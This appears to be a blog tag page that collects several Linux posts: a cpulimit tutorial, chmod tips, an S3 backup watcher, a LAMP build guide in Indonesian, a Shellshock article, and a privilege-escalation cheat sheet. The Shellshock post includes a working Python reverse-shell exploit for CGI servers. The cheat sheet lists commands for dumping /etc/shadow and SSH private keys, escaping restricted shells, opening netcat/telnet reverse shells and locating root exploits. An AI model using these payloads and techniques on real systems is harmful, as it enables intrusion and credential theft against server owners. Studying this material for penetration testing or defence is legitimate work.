Tags Posts tagged with "linux"

linux

856

Version 1.0

Author: Srijan Kishore
Last edited 25/Aug/2014

This document describes how to limit CPU usage in Ubuntu 14.04. I will use CPU-limit utilty for this purpose. Cpulimit is a tool which limits the CPU usage of a process (expressed in percentage, not in CPU time). It is useful to control batch jobs, when you don’t want them to eat too many CPU cycles. The goal of cpulimit is to prevent a process from running for more than a specified time ratio. It does not change the nice value or other scheduling priority settings, but the real CPU usage. Also, it is able to adapt itself to the overall system load, dynamically and quickly.
The control of the used CPU amount is done sending SIGSTOP and SIGCONT POSIX signals to processes.
All the children processes and threads of the specified process will share the same percentage of CPU.

1 Preliminary Note

This tutorial is based on Ubuntu 14.04 server, so you should set up a basic Ubuntu 14.04 server installation before you continue with this tutorial. The system should have a static IP address. I use 192.168.0.100 as my IP address in this tutorial and server1.example.com as the hostname.

2 Installation

Firstly we need to install cpulimit as follows:

apt-get update
apt-get install cpulimit

3 Limiting CPU usage

Now we will check the utility for limiting the CPU usage. For this we will first check the CPU usage without cpulimit and then implement the cpulimit to evaluate the same. Lets make it clear with the example.

  1. Here is an example of how to utilize your CPU with an application in single core CPU:

dd if=/dev/zero of=/dev/null &

root@server1:~# dd if=/dev/zero of=/dev/null &
[1] 1850
root@server1:~#

Then we will check the CPU usage with command:

top

top – 11:24:18 up 49 min,  1 user,  load average: 0.94, 1.02, 1.79
Tasks: 249 total,   2 running, 247 sleeping,   0 stopped,   0 zombie
%Cpu(s): 13.4 us, 11.6 sy,  0.0 ni, 74.9 id,  0.0 wa,  0.1 hi,  0.0 si,  0.0 st
KiB Mem:   1010540 total,   271652 used,   738888 free,    21760 buffers
KiB Swap:  1048572 total,        0 used,  1048572 free.   158204 cached Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
1850 root      20   0    7224    616    520 R 100.0  0.1   1:20.33 dd
1851 root      20   0   24952   1756   1180 R   0.3  0.2   0:00.03 top
1 root      20   0   33480   2776   1456 S   0.0  0.3   0:05.31 init
2 root      20   0       0      0      0 S   0.0  0.0   0:00.01 kthreadd

As we can see that CPU usage have gone 100%, now we will use the cpulimit to limit the CPU usage. We can bring up this process to foreground using fg and cancel it with CTRL+C

fg

root@server1:~# fg
dd if=/dev/zero of=/dev/null
^C222182151+0 records in
222182150+0 records out
113757260800 bytes (114 GB) copied, 259.084 s, 439 MB/s

root@server1:~#

Now we can test cpulimit to see if it actually does what it is supposed to. Let test it as follows:

cpulimit -l 30 dd if=/dev/zero of=/dev/null &

root@server1:~# cpulimit -l 30 dd if=/dev/zero of=/dev/null &
[1] 1852
root@server1:~# Process 1853 detected

[1]+  Done                    cpulimit -l 30 dd if=/dev/zero of=/dev/null
root@server1:~#

Now we will check the CPU usage with top command:

top

top – 11:30:54 up 55 min,  1 user,  load average: 0.20, 0.58, 1.34
Tasks: 250 total,   2 running, 247 sleeping,   1 stopped,   0 zombie
%Cpu(s):  4.5 us,  4.1 sy,  0.0 ni, 91.4 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   1010540 total,   271944 used,   738596 free,    21816 buffers
KiB Swap:  1048572 total,        0 used,  1048572 free.   158212 cached Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
1853 root      20   0    7224    612    520 T  33.8  0.1   0:35.53 dd
1 root      20   0   33480   2776   1456 S   0.0  0.3   0:05.37 init
2 root      20   0       0      0      0 S   0.0  0.0   0:00.01 kthreadd
3 root      20   0       0      0      0 S   0.0  0.0   0:00.02 ksoftirqd/0
4 root      20   0       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0

Now you can see  that the CPU usage have decreased from 100% to 33.8% almost 30%. So we have successfully checked the utility cpulimit which is able to limit the usage of CPU consumption in a single core Ubuntu distro.

  1. Here is an example of how to utilize your CPU with an application in multiple core CPU:

For checking your CPU core use the command:

nproc

 In my case it is CPU core count was 4.
Now we will proceed to check the CPU usage without cpulimit in all 4 cores for the an application as follows:

for j in `seq 1 4`; do dd if=/dev/zero of=/dev/null & done

It will run the command utilizing all the cores and yeild the output as:

root@server1:~# for j in `seq 1 4`; do dd if=/dev/zero of=/dev/null & done
[1] 1263
[2] 1264
[3] 1265
[4] 1266
root@server1:~#

Now check the CPU usage with top command:

top

top – 11:47:45 up 4 min,  1 user,  load average: 3.63, 1.53, 0.57
Tasks: 290 total,   5 running, 285 sleeping,   0 stopped,   0 zombie
%Cpu0  : 48.3 us, 51.3 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.3 hi,  0.0 si,  0.0 st
%Cpu1  : 47.8 us, 52.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
%Cpu2  : 53.3 us, 46.4 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.3 hi,  0.0 si,  0.0 st
%Cpu3  : 52.0 us, 48.0 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   1010540 total,   209712 used,   800828 free,    20276 buffers
KiB Swap:  1048572 total,        0 used,  1048572 free.    93632 cached Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
1263 root      20   0    7224    612    520 R 100.0  0.1   2:21.40 dd
1264 root      20   0    7224    616    520 R 100.0  0.1   2:21.41 dd
1265 root      20   0    7224    612    520 R  99.0  0.1   2:21.03 dd
1266 root      20   0    7224    616    520 R  98.0  0.1   2:20.82 dd
1281 root      20   0  104416   3992   2920 S   1.0  0.4   0:00.03 sshd
1283 root      20   0  104416   3988   2920 S   1.0  0.4   0:00.03 sshd
1279 root      20   0  104556   4008   2924 S   0.7  0.4   0:00.08 sshd    

The dd command is consuming almost 100% CPU of all the cores.  Next we will check the command with the cpulimit utility. For this kill previous traces for the dd command as follows:

killall dd




root@server1:~# killall dd
[1]   Terminated              dd if=/dev/zero of=/dev/null
[3]-  Terminated              dd if=/dev/zero of=/dev/null
[2]-  Terminated              dd if=/dev/zero of=/dev/null
[4]+  Terminated              dd if=/dev/zero of=/dev/null
root@server1:~#

Now use cpulimit with the same command as follows:

for j in `seq 1 4`; do cpulimit -l 20 dd if=/dev/zero of=/dev/null & done

root@server1:~# for j in `seq 1 4`; do cpulimit -l 20 dd if=/dev/zero of=/dev/null & done
[1] 1429
[2] 1430
[3] 1431
[4] 1432
root@server1:~# Process 1434 detected
Process 1433 detected
Process 1437 detected
Process 1439 detected

[1]   Done                    cpulimit -l 20 dd if=/dev/zero of=/dev/null
[2]   Done                    cpulimit -l 20 dd if=/dev/zero of=/dev/null
[3]-  Done                    cpulimit -l 20 dd if=/dev/zero of=/dev/null
[4]+  Done                    cpulimit -l 20 dd if=/dev/zero of=/dev/null
root@server1:~#

Now check the CPU usage wit the cpulimit utility.

top

top – 11:59:10 up 16 min,  2 users,  load average: 0.47, 0.71, 0.81
Tasks: 256 total,   2 running, 251 sleeping,   3 stopped,   0 zombie
%Cpu0  :  2.0 us,  2.0 sy,  0.0 ni, 96.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
%Cpu1  : 26.2 us, 22.8 sy,  0.0 ni, 50.7 id,  0.0 wa,  0.3 hi,  0.0 si,  0.0 st
%Cpu2  : 14.0 us, 12.3 sy,  0.0 ni, 73.8 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
%Cpu3  : 13.3 us, 11.6 sy,  0.0 ni, 75.1 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   1010540 total,   204064 used,   806476 free,    20408 buffers
KiB Swap:  1048572 total,        0 used,  1048572 free.    98340 cached Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
1433 root      20   0    7224    612    520 T  28.2  0.1   0:12.00 dd
1439 root      20   0    7224    616    520 R  26.6  0.1   0:12.13 dd
1434 root      20   0    7224    612    520 T  25.3  0.1   0:11.97 dd
1437 root      20   0    7224    612    516 T  22.9  0.1   0:11.93 dd
7 root      20   0       0      0      0 S   0.3  0.0   0:00.22 rcu_sched
8 root      20   0       0      0      0 S   0.3  0.0   0:00.21 rcuos/0      

As you can see above that the CPU usage is limited from 100%  to 20% almost for multiple core CPUs.

Congratulations! We have successfully tested the cpulimit for limiting the CPU usage in Ubuntu 14.04 🙂

4 Links

548

The popular Linux and Unix shell has a serious security problem that means real trouble for many web servers. Fortunately, a patch — as source code — is available. Bash, aka the Bourne-Again Shell, has a newly discovered security hole. And, for many Unix or Linux Web servers, it’s a major problem.

bash-v1-620x154

The flaw involves how Bash evaluates environment variables. With specifically crafted variables, a hacker could use this hole to execute shell commands. This, in turn, could render a server vulnerable to ever greater assaults.

By itself, this is one of those security holes where an attacker would already need to have a high level of system access to cause damage. Unfortunately, as Red Hat‘s security team put it, “Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.”

The root of the problem is that Bash is frequently used as the system shell. Thus, if an application calls a Bash shell command via web HTTP or a Common-Gateway Interface (CGI) in a way that allows a user to insert data, the web server could be hacked. As Andy Ellis, the Chief Security Officer ofAkamai Technologies, wrote: “This vulnerability may affect many applications that evaluate user input, and call other applications via a shell.”

That could be a lot of web applications — including many of yours.

The most dangerous circumstance is if your applications call scripts with super-user — aka root — permissions. If that’s the case, your attacker could get away with murder on your server.

You can try patch with this code:

#!/bin/sh
mkdir src
cd src
wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
for i in $(seq -f "%03g" 0 25); do wget     http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
tar zxvf bash-4.3.tar.gz
cd bash-4.3
for i in $(seq -f "%03g" 0 25);do patch -p0 < ../bash43-$i; done
./configure && make && make install
cd ..
cd ..
rm -r src
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

so.. how to try the reverse engineering ? here we go..

#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
	print "Usage: %s   " % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
	exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
	"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

481

Melakukan Chmod pada Linux per-files dan perdirektori.

I dont know what wrong with my server or my computer. Everytime I compress the files and upload via cpanel and extract with unzip cpanel the files always have permission 600 and directory got 700.

OMG, if I do # > chmod -R 755 . of course all files include directory can be executed.

Then how ? I got my way.. uncle google help me..

#> find . -type d -exec chmod 755 {} ;
#> find . -type f -exec chmod 644 {} ;

Ok that simple but also simple to forget 🙂 Just a little notice in my web.

555

Before starting, I would like to point out – I’m no expert. As far as I know, there isn’t a “magic” answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more “things” to look for. It’s just a basic & rough guide. Not every command will work for each system as Linux varies so much. “It” will not jump off the screen – you’ve to hunt for that “little thing” as “the devil is in the detail“.

Enumeration is the key.
(Linux) privilege escalation is all about:

  • Collect – Enumeration, more enumeration and some more enumeration.
  • Process – Sort through data, analyse and prioritisation.
  • Search – Know what to search for and where to find the exploit code.
  • Adapt – Customize the exploit, so it fits. Not every exploit work for every system “out of the box”.
  • Try – Get ready for (lots of) trial and error.

Operating System
What’s the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

What’s the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?
lpstat -a

Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service

Which service(s) are been running by root? Of these services, which are vulnerable – it’s worth a double check!
ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 “password” [filename]
find . -name “*.php” -print0 | xargs -0 grep -i -n “var $password”   # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig –list
chkconfig –list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

Have you got a shell? Can you interact with the system?
http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!

Is port forwarding possible? Redirect and interact with traffic from another view
rinetd
http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d:    # List of users
grep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 { print $1}’   # List of super users
awk -F: ‘($3 == “0”) {print}’ /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found? 
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything “interesting” in the home directorie(s)? If it’s possible to access
ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found? 
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found? 
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk ‘$1 ~ /^.*w.*/’ 2>/dev/null     # Anyone
ls -aRl /etc/ | awk ‘$1 ~ /^..w/’ 2>/dev/null        # Owner
ls -aRl /etc/ | awk ‘$1 ~ /^…..w/’ 2>/dev/null    # Group
ls -aRl /etc/ | awk ‘$1 ~ /w.$/’ 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ? 
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with “Local File Includes”!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, you break out of the “jail” shell?
python -c ‘import pty;pty.spawn(“/bin/bash”)’
echo os.system(‘/bin/bash’)
/bin/sh -i

How are file-systems mounted? 
mount
df -h

Are there any unmounted file-systems?
cat /etc/fstab

What “Advanced Linux File Permissions” are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) – run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) – run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r “bin$”`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in ‘common’ places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

find starting at root (/)SGID or SUIDnot Symbolic linksonly 3 folders deeplist with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few ‘common’ places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

Any “problem” files? Word-writeable, “nobody” files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com

Finding more information regarding the exploit 
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) “Common” exploits. Warning. Pre-compiled binaries files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations
Is any of the above information easy to find? 
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched? Kernel, operating system, all applications, their  plugins and web services 
apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required? 
For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net

Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm

Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

530

The achievement are to backup the server file every time the file update in certain folder and giving solution for the server load problem. Instead copying a lots of files every X minutes, this apps can help us to copying per file update.


yum install duplicity --enablerepo=epel
wget https://github.com/splitbrain/Watcher/archive/master.tar.gz
tar -zxvf master
mv watcher.ini /etc/
cp -p watcher.py /usr/sbin/
Edit watcher.ini

events=create,modify,move,write_close,attribute_change
command=export AWS_ACCESS_KEY_ID=EDITKEY;export AWS_SECRET_ACCESS_KEY=EDITKEY;/usr/bin/duplicity $filename --no-encryption --no-compression --no-print-statistics s3+http://BUCKETNAME


Start the watcher:

/usr/sbin/watcher.py start

451

Berikut adalah tutorial pembuatan MYSQL, HTTPD dan PGP untuk membuat Sebuah Server berbasis Web (Webserver). Sebelumnya sudah ada tutorial percakapan yg panjang lebar. Dan sekarang saya akan padat kan.

Saya memakai;

[root@NGETOP widhe]# id;uname -a
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
Linux NGETOP.NET.BLOK.4 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux

Dengan memakai minimal Installation FC4 ini, saya cukup kewalahan dengan update/install library yg dibutuhkan..

MYSQL 5.0.24

[root@NGETOP widhe]# wget http://komo.padinet.com/mysql/Downloads/MySQL-5.0/mysql-standard-5.0.22-linux-i686.tar.gz

[root@NGETOP widhe]# tar -zxvf mysql-standard-5.0.22-linux-i686.tar.gz
[root@NGETOP widhe]# mv mysql-standard-5.0.22-linux-i686 /usr/local/mysql
[root@NGETOP widhe]# cd /usr/local/mysql
[root@NGETOP mysql]# scripts/mysql_install_db
Installing all prepared tables
Fill help tables

To start mysqld at boot time you have to copy support-files/mysql.server
to the right place for your system

PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !
To do so, start the server, then issue the following commands:
./bin/mysqladmin -u root password ‘new-password’
./bin/mysqladmin -u root -h NGETOP.NET.BLOK.4 password ‘new-password’
See the manual for more instructions.

You can start the MySQL daemon with:
cd .; ./bin/mysqld_safe &

You can test the MySQL daemon with the benchmarks in the ‘sql-bench’ directory:
cd sql-bench; perl run-all-tests

Please report any problems with the ./bin/mysqlbug script!

The latest information about MySQL is available on the web at
http://www.mysql.com
Support MySQL by buying support/licenses at http://shop.mysql.com
[root@NGETOP mysql]# cd ..
[root@NGETOP local]# chown -R root.mysql mysql
[root@NGETOP local]# chmod -R 640 mysql
[root@NGETOP local]# chmod -R u+X,g+X mysql
[root@NGETOP local]# chmod -R ug+x mysql/bin
[root@NGETOP local]# chmod -R g+w mysql/data
[root@NGETOP local]# chmod -R u+x mysql/scripts
[root@NGETOP local]# cp mysql/support-files/my-medium.cnf /usr/local/mysql/data/my.cnf
[root@NGETOP local]# chgrp mysql mysql/data/my.cnf
[root@NGETOP local]# cd mysql
[root@NGETOP mysql]# bin/safe_mysqld –user=mysql &
[1] 7162
WARNING: Found /usr/local/mysql/data/my.cnf
Datadir is deprecated place for my.cnf, please move it to /usr/local/mysql

Starting mysqld daemon with databases from /usr/local/mysql/data

[root@NGETOP mysql]# ps ax |grep mysql

[root@NGETOP mysql]# bin/mysqladmin -u root password ‘passwordkamu’
[root@NGETOP mysql]# cp support-files/mysql.server /etc/rc.d/init.d/mysql
[root@NGETOP mysql]# chmod 744 /etc/rc.d/init.d/mysql
[root@NGETOP mysql]# chkconfig –add mysql
[root@NGETOP mysql]# service mysql restart
[root@NGETOP mysql]# ln -s /usr/local/mysql/bin/mysql /sbin/mysql
[root@NGETOP widhe]# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with; or g.
Your MySQL connection id is 8 to server version: 5.0.22-standard-log

Type ‘help;’ or ‘h’ for help. Type ‘c’ to clear the buffer.

mysql>

=== Selesai ===

HTTPD/APACHE 2.2.3 :

[root@NGETOP widhe]# wget http://apache.cbn.net.id/httpd/httpd-2.2.3.tar.gz
[root@NGETOP widhe]# tar -zxvf httpd-2.2.3.tar.gz
[root@NGETOP widhe]# cd httpd-2.2.3
[root@NGETOP httpd-2.2.3]# groupadd www
[root@NGETOP httpd-2.2.3]# useradd -g www www
[root@NGETOP httpd-2.2.3]# id www
uid=502(www) gid=502(www) groups=502(www)
[root@NGETOP httpd-2.2.3]# ./configure
–prefix=/usr/local/apache
–enable-mods-shared=all
–enable-ssl
–enable-suexec
–with-suexec-bin=/usr/local/apache/bin/suexec
–with-suexec-caller=502
–with-suexec-userdir=htdocs
–with-suexec-docrot=/
–with-suexec-uidmin=502
–with-suexec-gidmin=502
–with-suexec-logfile=/usr/local/apache/logs/suexec_log
–with-suexec-safepath=/usr/local/bin:/usr/bin:/bin

— truncated —

[root@NGETOP httpd-2.2.3]# make
[root@NGETOP httpd-2.2.3]# make install

PHP:

[root@NGETOP widhe]# wget http://id2.php.net/get/php-4.4.3.tar.gz/from/this/mirror
[root@NGETOP widhe]# tar -zxvf php-4.4.3.tar.gz
[root@NGETOP widhe]# cd php-4.4.3
[root@NGETOP widhe]# ./configure –prefix=/usr/local –with-apxs2=/usr/local/apache/bin/apxs –with-mysql-dir=/usr/local –with-xml –enable-bcmath –enable-calendar –enable-exif –enable-ftp –with-gettext –enable-mbstring –enable-mbstr-enc-trans –enable-mbregex –enable-discard-path –with-pear –with-ttf –enable-gd-native-ttf –with-openssl –with-zlib-dir=/usr/include –enable-libxml –with-libxml-dir=/usr/include/libxml2 –enable-module=so
[root@NGETOP widhe]# make
[root@NGETOP widhe]# make install

Lalu add AddType application/x-httpd-php .php dan DirectoryIndex index.php index.html

[root@NGETOP widhe]# cp php.ini-dist /usr/local/lib/php.ini
[root@NGETOP widhe]# chown -R root.www /usr/local/lib/php
[root@NGETOP widhe]# chmod -R g-w,o-rwx /usr/local/lib/php
[root@NGETOP widhe]# pico /etc/rc.d/init.d/httpd

Isinya ambil di ??? (contact saya di yahoo(YM) ID: ehdiw

[root@NGETOP widhe]# chmod 755 /etc/rc.d/init.d/httpd
[root@NGETOP widhe]# chkconfig –add httpd
[root@NGETOP widhe]# service httpd start

Buat di /usr/local/apache/htdocs test.php
pico test.php
Isinya :
<?php
phpinfo();
?>

Authors

91 POSTS0 COMMENTS